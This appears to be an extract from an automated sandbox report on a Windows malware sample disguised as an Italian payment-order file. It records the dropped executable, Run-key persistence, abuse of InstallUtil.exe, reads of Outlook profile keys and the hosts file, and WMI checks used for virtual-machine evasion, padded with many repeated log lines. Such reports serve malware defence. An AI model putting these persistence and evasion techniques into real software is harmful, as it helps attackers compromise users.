Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Controllo saldo 30% Ordine 5667.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Controllo saldo 30% Ordine 5667.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Code function: 0_2_04C4CC87 push ss; retn 0004h	0_2_04C4CC8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_010D84E8 push esp; retn 0002h	11_2_010D84E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_010D2741 push es; retn 0002h	11_2_010D2742
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_010D2F10 push cs; retn 0002h	11_2_010D2F12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_010D3B4F push ss; retn 0002h	11_2_010D3B52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_05F89710 push A4056C89h; retf 02AEh	11_2_05F89B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_05F8F70B push ecx; ret	11_2_05F8F70C
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_072A7972 push 74065CDDh; retf	13_2_072A798D
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_072B1777 push 8B000001h; iretd	13_2_072B177C
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 13_2_072B654C push cs; iretd	13_2_072B654F
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 14_2_07CB1777 push 8B000001h; iretd	14_2_07CB177C
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Code function: 14_2_07CB6546 push cs; iretd	14_2_07CB654F

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

File created: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Vajejvz			Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Vajejvz			Jump to behavior

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

